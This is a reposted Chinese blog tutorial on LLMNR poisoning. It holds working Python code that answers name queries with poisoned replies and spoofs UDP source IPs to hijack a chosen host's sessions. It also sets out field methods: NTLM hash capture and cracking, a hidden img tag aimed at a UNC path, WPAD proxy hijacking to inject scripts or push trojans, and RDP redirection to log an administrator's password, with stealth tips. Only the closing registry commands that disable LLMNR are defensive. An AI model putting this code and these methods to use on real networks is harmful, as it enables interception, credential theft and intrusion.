会员中心
足迹
动态
投票
消息
评论和@ 新增粉丝 赞和收藏 私信 系统通知 消息设置
创作中心
发布

llmnr协议 名称解析缺陷劫持内网指定主机会话

于 2020-06-23 11:47:29 发布 1603 收藏 9
原文链接:https://blog.csdn.net/whatday/article/details/106917992
版权

目录

0x00 LLMNR 简介

0x01 LLMNR 协议分析

0x02 LLMNR 名称解析过程

0x03 编程实现 LLMNR 的质询和应答

0x04 LLMNR Poison 攻击原理

0x05 利用伪造源 IP + LLMNR Poisone 劫持内网指定主机会话

0x06 LLMNR Poison 实战攻击思路

0x07 总结

 

0x00 LLMNR 简介

从 Windows Vista 起,Windows 操作系统开始支持一种新的名称解析协议 —— LLMNR,主要用于局域网中的名称解析。LLMNR 能够很好的支持 IPv4 和 IPv6,因此在 Windows 名称解析顺序中是一个仅次于 DNS 的名称解析方式,更重要的是在 Linux 操作系统中也实现了 LLMNR。

0x01 LLMNR 协议分析

LLMNR 协议定义在 RFC 4795 中。文档里详细的介绍了有关于 LLMNR 协议的结构,配置以及安全性等内容。

LLMNR 的协议结构如下图所示:

图 1:LLMNR 协议结构

LLMNR 协议结构图中各个字段的说明如下:

  • ID - Transaction ID是一个随机生成的用来标识质询与应答的 16 位标识符。
  • QR - 0 为查询,1 为响应
  • OPCODE - 是一个 4 位的字段,用来指定在此消息中的查询类型。该字段的值会在发起查询时被设置并复制到响应消息中。此规范定义了标准的查询和响应 (OPCODE 的值为零) 的行为。在未来的规范中可以在 LLMNR 中定义其他的 OPCODE。
  • C - 冲突位。
  • TC - 截断位。
  • T - 暂定,无标志。
  • Z - 保留位。
  • RCODE - 响应码。
  • QDCOUNT - 16 位的无符号整数,指定在质询部分中的条目数量。
  • ANCOUNT - 16 位的无符号整数,指定在应答部分中的资源记录数量。
  • NSCOUNT - 16 位的无符号整数,指定在权威记录部分的名称服务器资源录数量。
  • ARCOUNT - 16 位的无符号整数,指定在附加记录部分的资源记录数量。

0x02 LLMNR 名称解析过程

一个完整的正常的 LLMNR 名称解析过程如下图所示:

注:假定主机 B 已加入了组播组中。

图 2:一个完整的正常的 LLMNR 名称解析过程

LLMNR 名称解析过程所使用的传输协议为 UDP 协议,IPv4 的广播地址为 - 224.0.0.252, IPv6 的广播地址为 - FF02:0:0:0:0:0:1:3 或 FF02::1:3。在主机中所监听的端口为 UDP/5355。

使用 Wireshark 抓取一个完整的 LLMNR 质询/应答过程的数据包,如下图所示:

图 3:一个完整的 LLMNR 质询/应答过程数据包

从上图可以看到,编号为 No.3 和 No.4 的数据包证明了主机 A 分别使用自己的 IPv4 地址和 IPv6 地址向 IPv4 和 IPv6 的广播地址进行了广播,质询数据包的 TID 为 0xc7f7。查询的地址类型为请求主机 B 的 IPv4 地址,这一点可以从 A 或 AAAA 进行区别。一个 A 表示请求的地址类型为 IPv4 地址,四个A(AAAA)表示请求的地址类型为 IPv6 地址。

编号为 No.5 的数据包证明了主机 B(192.168.16.130)收到请求数据包后,发现有主机请求自己的 IP地址,于是向主机 A 进行单播应答,将自己的 IP 地址单播给了主机 A,应答的地址类型为 IPv4,同时该数据包的 TID 的值为上面主机 A 进行广播的数据包的 TID —— 0xc7f7。

质询的数据包详细结构如下图所示:

图 4:质询的数据包详细结构

应答的数据包详细结构如下图所示:

图 5:应答的数据包详细结构

0x03 编程实现 LLMNR 的质询和应答

通过上面的内容,可以很直观的理解 LLMNR 进行名称解析的详细过程。使用 Python 可以快速实现 LLMNR 协议的质询和应答编程。

LLMNR 协议的质询过程实际上就是进行了一个广播。直接看代码。

质询的代码如下:

LLMNR Query Demo Code

  1. #!python
  2. #/usr/bin/env python
  3.  
  4. __doc__ = """
  6.     LLMNR Query ,
  7.                     by Her0in
  9. """
  10.  
  11. import socket, struct
  12.  
  13. class LLMNR_Query:
  14.     def __init__(self,name):
  15.         self.name = name
  16.  
  17.         self.IsIPv4 = True
  18.         self.populate()
  19.     def populate(self):
  20.         self.HOST = '224.0.0.252' if self.IsIPv4 else 'FF02::1:3'
  21.         self.PORT = 5355
  22.         self.s_family = socket.AF_INET if self.IsIPv4 else socket.AF_INET6
  23.  
  24.         self.QueryType = "IPv4"
  25.         self.lqs = socket.socket(self.s_family, socket.SOCK_DGRAM)
  26.  
  27.         self.QueryData = (
  28.         "\xa9\xfb"  # Transaction ID
  29.         "\x00\x00"  # Flags Query(0x0000)? or Response(0x8000) ?
  30.         "\x00\x01"  # Question
  31.         "\x00\x00"  # Answer RRS
  32.         "\x00\x00"  # Authority RRS
  33.         "\x00\x00"  # Additional RRS
  34.         "LENGTH"    # length of Name
  35.         "NAME"      # Name
  36.         "\x00"      # NameNull
  37.         "TYPE"      # Query Type ,IPv4(0x0001)? or IPv6(0x001c)?
  38.         "\x00\x01") # Class
  39.         namelen = len(self.name)
  40.         self.data = self.QueryData.replace('LENGTH', struct.pack('>B', namelen))
  41.         self.data = self.data.replace('NAME', struct.pack(">"+str(namelen)+"s", self.name))
  42.         self.data = self.data.replace("TYPE",  "\x00\x01" if self.QueryType == "IPv4" else "\x00\x1c")
  43.  
  44.     def Query(self):
  45.         while(True):
  46.             print "LLMNR Querying... -> %s" % self.name
  47.             self.lqs.sendto(self.data, (self.HOST, self.PORT))
  48.         self.lqs.close()
  49.  
  50. if __name__ == "__main__":
  51.     llmnr = LLMNR_Query("Wooyun")
  52.     llmnr.Query()

要对 LLMNR 协议的质询请求进行应答,首先要将本机加入多播(或组播)组中,所使用的协议为 IGMP。具体编程实现的方式可以直接构造数据包使用 UDP 发送,也可以使用套接字提供的 setsockopt 函数进行设置。

应答的实现方式很简单,创建一个 UDP 套接字使用 setsockopt 函数加入多播组并监听 5355 端口,当然也可以使用非阻塞的 SocketServer 模块实现,效果更佳。

具体代码如下:

LLMNR Answer Demo Code

  1. #!python
  2. #/usr/bin/env python
  3.  
  4. __doc__ = """
  6.     LLMNR Answer ,
  7.                     by Her0in
  9. """
  10.  
  11. import socket, struct
  12.  
  13. class LLMNR_Answer:
  14.     def __init__(self, addr):
  15.  
  16.         self.IPADDR  = addr
  17.         self.las = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  18.         self.init_socket()
  19.         self.populate()
  20.     def populate(self):
  21.  
  22.         self.AnswerData = (
  23.             "TID"               # Tid
  24.             "\x80\x00"          # Flags  Query(0x0000)? or Response(0x8000) ?
  25.             "\x00\x01"          # Question
  26.             "\x00\x01"          # Answer RRS
  27.             "\x00\x00"          # Authority RRS
  28.             "\x00\x00"          # Additional RRS
  29.             "LENGTH"            # Question Name Length
  30.             "NAME"              # Question Name
  31.             "\x00"              # Question Name Null
  32.             "\x00\x01"          # Query Type ,IPv4(0x0001)? or IPv6(0x001c)?
  33.             "\x00\x01"          # Class
  34.             "LENGTH"            # Answer Name Length
  35.             "NAME"              # Answer Name
  36.             "\x00"              # Answer Name Null
  37.             "\x00\x01"          # Answer Type ,IPv4(0x0001)? or IPv6(0x001c)?
  38.             "\x00\x01"          # Class
  39.             "\x00\x00\x00\x1e"  # TTL Default:30s
  40.             "\x00\x04"          # IP Length
  41.             "IPADDR")           # IP Address
  42.  
  43.     def init_socket(self):
  44.         self.HOST = "0.0.0.0"
  45.         self.PORT = 5355
  46.         self.MulADDR  = "224.0.0.252"
  47.         self.las.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
  48.         self.las.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
  49.         self.las.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP,
  50.                        socket.inet_aton(self.MulADDR) + socket.inet_aton(self.HOST))
  51.  
  52.     def Answser(self):
  53.         self.las.bind((self.HOST, self.PORT))
  54.         print "Listening..."
  55.         while True:
  56.             data, addr = self.las.recvfrom(1024)
  57.  
  58.             tid = data[0:2]
  59.             namelen = struct.unpack('>B', data[12])[0]
  60.             name = data[13:13 + namelen]
  61.  
  62.             data = self.AnswerData.replace('TID', tid)
  63.             data = data.replace('LENGTH', struct.pack('>B', namelen))
  64.             data = data.replace('NAME', name)
  65.             data = data.replace('IPADDR', socket.inet_aton(self.IPADDR))
  66.  
  67.             print "Poisoned answer(%s) sent to %s for name %s " % (self.IPADDR, addr[0], name)
  68.             self.las.sendto(data, addr)
  69.  
  70.         self.las.setsockopt(socket.IPPROTO_IP, socket.IP_DROP_MEMBERSHIP,
  71.                        socket.inet_aton(self.MulADDR) + socket.inet_aton(self.HOST))
  72.         self.las.close()
  73.  
  74. if __name__ == "__main__":
  75.     llmnr = LLMNR_Answer("11.22.33.44")
  76.     llmnr.Answser()

最终执行后结果如下图所示:

图 6:Python 实现 LLMNR 质询与应答 1

下图为模拟主机查询主机名称为Wooyun的结果

图 7:Python 实现 LLMNR 质询与应答 2

0x04 LLMNR Poison 攻击原理

图 2 说明了一个完整的正常的 LLMNR 质询/应答过程。由于 LLMNR 使用了无连接的 UDP 协议发送了广播,之后,多播组内的主机就可以对发起名称解析的主机进行应答,因此,在这个过程中,攻击者就有机可乘。

攻击者可以将自己的主机加入到组播组中,当收到其他主机进行名称解析的质询请求,就可以对发起此次名称解析的主机进行“恶意”应答。利用此缺陷进行欺骗攻击的方式称为 LLMNR Poison 攻击

“恶意”应答过程如下图所示:

图 8: 攻击者进行“恶意”应答过程图示

LLMNR 名称解析的最大缺陷就是,在当前局域网中,无论是否存在主机 B(假定机器名为:SECLAB-HER0IN),只要有主机请求 SECLAB-HER0IN 都会进行一次 LLMNR 名称解析。

0x05 利用伪造源 IP + LLMNR Poisone 劫持内网指定主机会话

由于 UDP 是面向无连接的,所以不存在三次握手的过程,因此,在 LLMNR 名称解析过程中,UDP 的不安全性就凸显出来了。攻击者可以伪造源 IP 地址向广播地址发送 LLMNR 名称解析质询,之后攻击者再对这个质询进行应答,完全是一场 “自导自演” 的戏。

修改 UDP 源 IP 的代码如下:

UDP Source IP Spoof Demo Code

  1. #!python
  2. #/usr/bin/env python
  3.  
  4. __doc__ = """
  6.     UDP Source IP Spoof ,
  7.                     by Her0in
  9. """
  10.  
  11. import socket, time
  12. from impacket import ImpactDecoder, ImpactPacket
  13.  
  14. def UDPSpoof(src_ip, src_port, dst_ip, dst_port, data):
  15.     ip = ImpactPacket.IP()
  16.     ip.set_ip_src(src_ip)
  17.     ip.set_ip_dst(dst_ip)
  18.  
  19.     udp = ImpactPacket.UDP()
  20.     udp.set_uh_sport(src_port)
  21.     udp.set_uh_dport(dst_port)
  22.  
  23.     udp.contains(ImpactPacket.Data(data))
  24.     ip.contains(udp)
  25.  
  26.     s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_UDP)
  27.     s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
  28.     s.sendto(ip.get_packet(), (dst_ip, dst_port))
  29.  
  30. if __name__ == "__main__":
  31.     QueryData = (
  32.         "\xa9\xfb"  # Transaction ID
  33.         "\x00\x00"  # Flags Query(0x0000)? or Response(0x8000) ?
  34.         "\x00\x01"  # Question
  35.         "\x00\x00"  # Answer RRS
  36.         "\x00\x00"  # Authority RRS
  37.         "\x00\x00"  # Additional RRS
  38.         "\x09"      # length of Name
  39.         "Her0in-PC"    # Name
  40.         "\x00"      # NameNull
  41.         "\x00\x01"  # Query Type ,IPv4(0x0001)? or IPv6(0x001c)?
  42.         "\x00\x01") # Class
  43.  
  44.     ip_src = "192.168.169.1"
  45.     ip_dst = "224.0.0.252"
  46.  
  47.     while True:
  48.         print("UDP Source IP Spoof %s => %s for Her0in-PC" % (ip_src, ip_dst))
  49.         UDPSpoof(ip_src, 18743,ip_dst , 5355, QueryData)
  50.         time.sleep(3)

为了不要那么暴力,加个延时,实际上在 LLMNR 应答数据包中有一个 TTL 默认为 30s,所以在实战中为了隐蔽可以将延时加大

具体攻击过程如下:

  • 攻击者(IP:111.111.111.111)伪造受害者(IP:222.222.222.222)向 LLMNR 协议的广播地址发送 LLMNR 质询,请求解析名称为:HER0IN-PC(IP:333.333.333.333) 的 IP
  • 攻击者(IP:111.111.111.111)加入多播组收到 “受害者” 的请求,对质询进行响应,将自己的IP(可以是任何 IP)单播给受害者

攻击的效果就是,受害者只要使用计算机名称访问 HER0IN-PC 这台主机的任何服务,都会被重定向到攻击者指定的 IP 上。

测试环境如下:

  • 攻击者主机 IP:192.168.169.5(启动伪造 IP 进行 LLMNR 广播的恶意程序 以及 LLMNR 应答程序)
  • 受害者 IP:192.168.169.1 无需任何操作
  • 当受害者访问内网某台主机的 WEB 服务时被重定向到攻击者主机的 WEB 服务器

看图说话,图片信息量较大 ;)

图 9 : 攻击者主机 启动相应的程序,并提供了 WEB 服务

图 10 : 当受害者访问win2k3-3a85d681 这台主机的 WEB 服务时被重定向到攻击者主机的 WEB 服务器

图 11 : 可以明显的看到受害者原本想访问的 WEB 服务器是 Windows Server 2003 却被攻击者“重定向”到了一台 Linux 主机上

关于“利用伪造源 IP + LLMNR Poisone 劫持内网指定主机会话”就这么多,图片信息量较大,请自行梳理,利用这种攻击手段可以做很多事情,剩下的全靠自由发挥 ;)

0x06 LLMNR Poison 实战攻击思路

在局域网中,名称解析的行为是非常频繁的,只要有使用计算机名称,准确的说是 NetBIOS名称或非 FQDN 域名的地方都会产生名称解析,如 PING 主机名称,使用主机名称连接各种服务等等。Windows 系统也默认启用了 NetBIOS 和 LLMNR。这就使得 LLMNR Poison 攻击的实战价值有所提升。但实际上在实战中使用 LLMNR Poison 攻击时,会遇到一些问题。如,5355 端口被占用,防火墙拦截等,不过这些小问题都是可以解决掉的,另外还有一些不可控的客观因素,如网络稳定性等等。但这些问题也不是非常普遍不可解决的。

下面提供几种在实战中可用的 LLMNR Poison 攻击思路。以 Responder 做为攻击工具进行演示。

劫持会话获取 HASH

通过劫持会话获取受害者的 HASH,有两种常见的攻击场景。

  • 劫持 SMB 会话获取 HASH
    利用 LLMNR Poison 攻击劫持 SMB 会话与 SMBRelay 攻击相似,本质上都是对 SMB 的会话进行劫持,但是 SMBRelay 攻击是被动式的攻击,同时,攻击者所劫持的 SMB 会话只有在该会话本身是一次成功的会话的情况下才能拿到目标服务器的权限。利用 LLMNR Poison 攻击劫持 SMB 会话,只要有主机使用计算机名称访问其他主机的共享时就可以得到发起共享请求的主机的 HASH。但是这个 HASH 只能用于爆破(因为已知了挑战),无法直接登录主机。可以将 LLMNR Poison 攻击 与 SMBRelay 攻击结合起来,提升攻击力。
  • 使用 HTTP 401 认证获取 HASH
    使用 HTTP 401 认证同样也可以获取到客户端机器的 HASH。

攻击的方式大致为:

  • 结合社工欺骗受害者访问一个正常的但已嵌入类似于<img/src=\\SECLAB-HER0IN\1.jpg width=0 height=0> 或 <img/src=http:\\SECLAB-HER0IN\1.jpg width=0 height=0> 的网页。
  • 当受害者访问网页后,如果受害者主机系统版本是 Vista 之后的,就会产生 LLMNR 名称解析。
  • 此时攻击者的主机(已启动了 Responder )就会收到受害者主机的 HASH。
  • 当然也可以一直启动 Responder 进行监听,不需要其他额外的操作,只要有主机使用计算机名称请求 SMB 或 WEB 服务就可以得到相应主机的 HASH。

图 12:SMB 会话劫持获取 HASH

图 13:使用 John 破解 SMB 会话劫持到的 HASH

劫持会话进行钓鱼

使用 HTTP 401 认证服务器进行钓鱼。

图 14: HTTP 401 认证服务器钓鱼

图 15: “钓鱼”攻击获取到了 HASH

劫持 WPAD 获取上网记录

在 Windows 系统中,默认启用了 WPAD 功能,可以对 IE 浏览器-工具-internet-连接-局域网设置-自动检测设置 和 系统服务中的 WinHttpAutoProxySvc 服务进行开关设置。

启用了 WPAD 的主机,会持续请求名为WPAD的主机名称,因此可以利用 LLMNR Poison 攻击更改受害者主机的浏览器代理设置。这样就可以在攻击者自己的代理服务器中看到受害者的上网浏览记录,也可以在受害者正在访问的网页中嵌入任何你想要嵌入的恶意脚本代码,如各种钓鱼,弹框认证,下载文件等等。另外,由于 WPAD 是一个系统的 HTTP 代理设置,所以 Windows 更新也会使用这个代理,这样就可以利用 Windows 更新将木马下载到受害者主机并自动执行。

但是 WPAD 在实战中也同样会受到各种不可控的客观因素的影响。只有手动设置了浏览器代理配置,通过 WPAD 的代理上网的效果才比较明显。

“剑走偏锋” 获取服务器密码

上面已经提到,在局域网中,只要有主机使用其他主机的名称请求服务就可以产生名称解析行为。假定有这样一个场景,在渗透到内网后,进一步渗透的条件很苛刻,这时候你“黔驴技穷”(:0)了,为了能在内网中拿到一台服务器,以便“站稳脚跟”。或许你可以采用“剑走偏锋”的思路,利用 LLMNR Poison 攻击进行 3389 连接欺骗,拿到服务器的密码,这样做的确有些冒险,可是总好过你直接修改 IP 去欺骗登录要好很多(真有人这么做过 ~,~!)。

测试环境如下:

  • 一台 Windows Server 2008 (Win2k8 支持 LLMNR)作为管理员的主机 IP:172.16.0.8
  • 一台 Windows Server 2003 (假定为内网的一台服务器) 机器名称:WIN2K3-3A85D681 IP:172.16.0.3
  • 一台 Windows XP (已开 3389 为了演示效果所用) IP:172.16.0.100
  • 一台 BT5-R3 攻击者的主机 (启动 Responder) IP:172.16.0.128

场景如下:

管理员的主机(Win2k8)连接内网服务器(Win2k3)进行常规维护,攻击者(BT5-R3)利用 LLMNR Poison 攻击劫持了 3389 连接会话,为了更加明显的演示出攻击效果,我将 3389 连接会话重定向到一台 XP 中

OK,看图说话;),攻击效果如下:

 

图 16: 管理员(Win2k8)连接内网服务器(Win2k3),但是被 LLMNR Poison 攻击劫持,重定向到了 XP 上。

图 17:从攻击者的机器中,也可以看到 Responder 做了“恶意”应答,同时,利用 lcx 转发 3389 也有数据流在跑,可以从 IP 中判断出来

图 18:在 XP 中已经安装了某记录登录密码的程序,可以记录任何成功或失败的登录信息 :D,上图中可以看到管理员输入的登录信息。

0x07 总结

关于 LLMNR Poison 攻击的实战思路有很多,包括劫持 FTP,MySQL,MSSQL Server等等。具体的实现,请自由发挥。

为了防止遭到 LLMNR Poison 攻击,可以导入下面的注册表键值关闭 LLMNR:

  1. reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient" /v EnableMulticast /t REG_DWORD /d 0 /f
  2. reg add "HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows NT\DNSClient" /v EnableMulticast /t REG_DWORD /d 0 /f

不过,关闭了 LLMNR 以后, 可能用户的一些正常需求会受到影响,:)

 

 

whatday
关注
mitm6:通过IPv6攻破IPv4
weixin_30823833的博客
01-23 80
一、前言 虽然IPv6正在互联上逐步推广,但在络环境中使用IPv6的公司依然非常稀少。然而,大多数公司并不知道,即使他们没有动去使用IPv6,但从Windows Vista以来,所有的Windows系统(包括服务器版系统)都会启用IPv6络,并且其优先级要高于IPv4络。在本文中,我们介绍了一种攻击方法,这种攻击可以滥用Windows络中默认的IPv6配置,充当恶意DNS服务器来...
LLMNR欺骗工具Responder .docx
08-12
LLMNR欺骗工具Responder .docx
mDNS和LLMNR_mtAsnow的博客
6-15
在DNS 服务器不可用时,DNS 客户端计算机可以使用本地链路多播名称解析 (LLMNR—Link-Local Multicast Name Resolution)(也称为多播 DNS 或 mDNS)来解析本地段上的名称。例如,如果路由器出现故障,从络上的所有 DNS 服务器切断了子...
域名解析-DNS-MDNS-LLMNR
wenshifang的专栏
08-20 5399
域名系统DNS(Domain Name System)。 络上提供名字解析的服务称为域名服务器,络上存在大量树状组织的DNS服务器,用来完成用域名到络地址或者络地址到域名的解析工作。DNS是一种最传统,最重要,也是最常用的,工作原理可参考http://blog.csdn.net/yipiankongbai/article/details/25031461的详细描述。在用Wireshark抓
组播风暴引起的路由系统重启(LLMNR协议
wgl307293845的博客
11-19 491
络拓扑 一台路由设备连接可以上的上级,连接方式DHCP,一台中继器,2.4G和5G同时中继到路由设备(双频中继之后,优先走5G),一台chromecast播放视频,一台ipad连接,一台络摄像头连接,一台PC连接,终端都是连接到中继器下级 问题描述 使用过程中出现路由器自动重启 问题分析 1.路由器连接串口,top指令查看4核CPU有三个核占用率在90%以上,系统严重卡顿,sirq占用率超过60% 2.分析系统崩溃日志,发现CPU由于负载过高还有长时间被还在那用导致系统出现...
Linux5355端口被0.0.0.0监听
西溪少女的梦
08-02 2203
Linux后台有个systemd-resolv进程,占用5355等端口 博在一次络安全加固行动中,netstat -anp发现Linux后台有一个被0.0.0.0监听的端口,5355,显示被systemd-resolv占用,如下所示: tcp 0 0 0.0.0.0:5355 0.0.0.0:* LISTEN 3110/systemd-re...
LLMNR协议
天元喜羊羊的博客
05-25 1万+
http://en.wikipedia.org/wiki/Link-local_Multicast_Name_Resolution The Link Local Multicast Name Resolution (LLMNR) is a protocol based on the Domain Name System (DNS) packet format that allows
域名解析-DNS与MDNS-LLMNR
小白裸奔
09-12 7296
域名系统DNS(Domain Name System)。  络上提供名字解析的服务称为域名服务器,络上存在大量树状组织的DNS服务器,用来完成用域名到络地址或者络地址到域名的解析工作。 在用Wireshark抓包时发现很多与DNS有关的协议,其中有LLMNR和MDNS特此记录一下: 一、LLMNR定义  在DNS 服务器不可用时,DNS 客户端计算机可以使用本地链路多播名称解析 (
内网渗透研究:LLMNR和NetBIOS欺骗攻击分析
whatday的专栏
07-30 881
目录 基础知识 LLMNR是什么? LLMNR 的工作过程 NetBIOS是什么? Windows系统名称解析顺序 LLMNR和NetBIOS欺骗攻击 攻击原理 Responder工具利用过程 针对LLMNR和NetBIOS欺骗攻击的防御 基础知识 LLMNR是什么? 链路本地多播名称解析LLMNR)是一个基于协议的域名系统(DNS)数据包的格式,使得双方的IPv4和IPv6的主机来执行名称解析为同一本地链路上的主机。当局域中的DNS服务器不可用时,DNS客户端会使用LLMNR.
LLMNR Poison技术详解
最新发布
不忘初心,护天下安全!
06-05 73
从 Windows Vista 起,Windows 操作系统开始支持一种新的名称解析协议 —— LLMNR要用于局域中的名称解析LLMNR 能够很好的支持 IPv4 和 IPv6,因此在 Windows 名称解析顺序中是一个仅次于 DNS 的名称解析方式,更重要的是在 Linux 操作系统中也实现了 LLMNRLLMNR 协议定义在 RFC 4795 中。文档里详细的介绍了有关于 LLMNR 协议的结构,配置以及安全性等容。LLMNR协议结构如下图所示: LLMNR 协议结构
内网学习笔记】18、LLMNR 和 NetBIOS 欺骗攻击
TeamsSix 的 CSDN 空间
07-30 355
0、前言 如果已经进入目标络,但是没有获得凭证,可以使用 LLMNR 和 NetBIOS 欺骗攻击对目标进行无凭证条件下的权限获取。 1、基本概念 LLMNR 本地链路多播名称解析LLMNR)是一种域名系统数据包格式,当局域中的 DNS 服务器不可用时,DNS 客户端就会使用 LLMNR 解析本地段中机器的名称,直到 DNS 服务器恢复正常为止。 从 Windows Vista 开始支持 LLMNR ,Linux 系统也通过 systemd 实现了此协议,同时 LLMNR 也支持 IPv6。 Net
银河麒麟桌面操作系统 V10 SP1 设置DNS 的方法
weixin_40579171的博客
08-26 3833
部分Ubuntu文档中说,直接修改/etc/resolv.conf文件中的DNS信息,但是在银河麒麟桌面操作系统V10 SP1 中不能生效。 在银河麒麟桌面操作系统V10 SP1 中修改DNS信息,应该参考如下步骤: 一、首先修改 /etc/systemd/resolved.conf文件,在其中添加DNS信息 在终端中执行以下命令: sudo vim /etc/systemd/resolved.conf /etc/systemd/resolved.conf文件大致容如下: [Resolve] #DNS=
LLMNR欺骗工具Responder
大学霸__IT达人
04-06 1628
LLMNR欺骗工具Responder
渗透测试中的LLMNR/NBT-NS欺骗攻击
大方子
06-30 1061
简介 LLMNR&NBT-NS欺骗攻击是一种经典的络攻击,然而由于一方面了解它的人很少,另一方面在Windows中它们是默认启用的,所以该攻击到现在仍然是有效的。在本文中,我们首先为读者解释什么是LLMNR&NBT-NS攻击,然后介绍如何通过该攻击进行渗透测试,最后,给出针对该漏洞的防御措施。 什么是LLMNR和NetBIOS名称服务器广播? 当DNS名称服务器请求失败时,Micr...
【计算机络】常用络命令
热门推荐
Alex_SCY的博客
03-13 1万+
实验目的 了解ping、ipconfig 、netstat、tracert、ARP、route、nslookup等常用络工具的功能以及使用方法,并通过这些工具发现或者验证络中的故障。
pxe装机dhcp获取不到_PXE引导无法通过DHCP获取IP地址,但是在操作系统引导时DHCP可以工作...
weixin_42445810的博客
12-23 901
我正在尝试PXE引导Cisco UCS C240服务器以通过络安装新的操作系统,但是在引导过程中它没有通过DHCP来获取IP地址。我从英特尔启动代理收到“未收到DHCP或proxyDHCP报价”错误。 DHCP服务器上的tcpdump显示在DHCP服务器计算机上未收到与DHCP相关的数据包:tcpdump -n -e -i eth2 ether src FC:99:47:49:D4:9E or ...
java程序中调用cmd,执行获取访问程序对应ip的mac信息,记录用户登录情况
songfelicity的博客
09-17 388
业务场景为:记录用户使用系统情况,哪个帐号在什么时间通过哪个ip地址,哪个mac地址访问的系统。 双卡的一定要看到最后 完整代码在后面。 一、启动 Windows 命令解释器的一个新实例执行命令 1.单命令 参数是命令行数组,例如:String []cmd={"cmd","/c","ping "+ip} 运行 cmd /C 执行字符串指定的命令然后终止 执行 ping ip Process 类提供了执行从进程输入、执行输出到进程、等待进程完成、检查进程的退出状态以及销毁(...
常用端口
ppby2002的专栏
02-06 1892
端口号码 / 层 名称 注释 1 tcpmux TCP 端口服务多路复用 5 rje 远程作业入口 7 echo Echo 服务 9 discard 用于连接测试的空服务 11 systat 用于列举连接了的端口的系统状态 13 daytime 给请求主机发送日期和时间 17 qotd 给
关于LLMNR
weixin_33860737的博客
06-08 764
什么是LLMNR 在DNS 服务器不可用时,DNS 客户端计算机可以使用本地链路多播名称解析 (LLMNR—Link-Local Multicast Name Resolution)(也称为多播 DNS 或 mDNS)来解析本地段上的名称。例如,如果路由器出现故障,从络上的所有 DNS 服务器切断了子,...
NetBIOS名称欺骗和LLMNR欺骗
合天网安学院
04-27 393
本文原创作者:贺兰山缺口原创投稿详情:重金悬赏 | 合天原创投稿等你来!NetBIOS和LLMNR简介 NetBIOS和Link-LocalMulticast NameRe...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
©️2022 CSDN 皮肤主题:代码科技 设计师:Amelia_0503 返回首页
评论
还能输入1000个字符
 
表情包 插入表情
表情包 代码片
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值

举报

选择你想要举报的内容(必选)
  • 内容涉黄
  • 政治相关
  • 内容抄袭
  • 涉嫌广告
  • 内容侵权
  • 侮辱谩骂
  • 样式问题
  • 其他

取消

确定

只看
目录 隐藏
侧栏 新手
引导 客服 举报 返回
顶部